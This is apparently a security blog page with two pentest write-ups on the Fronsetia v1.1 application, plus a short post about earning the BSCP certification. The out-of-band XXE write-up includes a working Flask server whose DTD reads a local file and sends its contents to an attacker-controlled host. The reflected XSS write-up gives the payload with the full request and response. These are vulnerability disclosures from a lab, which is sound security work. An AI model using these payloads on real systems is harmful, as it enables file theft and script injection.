Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1

Description

- The application is vulnerable to OOB XXE injection

XXE #1 - "show_operations.jsp"

Steps to Reproduce:

1. Add Python3 server to serve malicious XXE payload
2. Add a file on the file system to be read via the application XXE payload echo 123123 > /tmp
3. Enter the following URL as input

http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl

// Python Server Code

from flask import Flask, Response, request

import logging

app = Flask(__name__)

# Set up logging

logging.basicConfig(level=logging.DEBUG)

@app.route('/testxxeService', defaults={'path': ''})

def catch_all(path):

    app.logger.debug("Serving XXE payload")

    xml = """<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE data [

  <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;

]>

<data>&send;</data>"""

    return Response(xml, mimetype='text/xml', status=200)

@app.route('/data.dtd', defaults={'path': ''})

def hello(path):

    app.logger.debug("DTD requested")

    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">

<!ENTITY % eval "<!ENTITY &#37; exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">

%eval;

%exfil;"""

    return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":

    app.run(host='0.0.0.0', port=10000)

Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1

 Description

- It was found that the application was vulnerable to Reflected XSS

Reflected XSS #1 - "show_operations.jsp"

Steps to Reproduce:

1. Visit main page of the application.
2. In the input field of "WSDL Location" enter the following payload "><img src=x onerror=alert(1)>

// HTTP GET Request

GET /fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1

Host: 192.168.78.128:8080

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0

[...]

// HTTP Response

HTTP/1.1 200 

Content-Type: text/html;charset=ISO-8859-1

Content-Length: 6360

Date: Wed, 20 Nov 2024 19:42:15 GMT

Keep-Alive: timeout=20

Connection: keep-alive

[...]

<title> Fronsetia: "><img src=x onerror=alert(1)> </title>

[...]

Its Official - BSCP Certified

Its official. Im BSCP (Burp Suite Certified Practitioner) certified. Took me a few tries to pass :)

Key takeaways from the attempts:

• Dont give up 
• Its a difficult exam
• Check all the relevant labs in the Portswigger Academy
• Check for bypasses in the Academy labs 
• Make sure to have a good list of notes such as payloads and bypasses ready 

Thats it folks !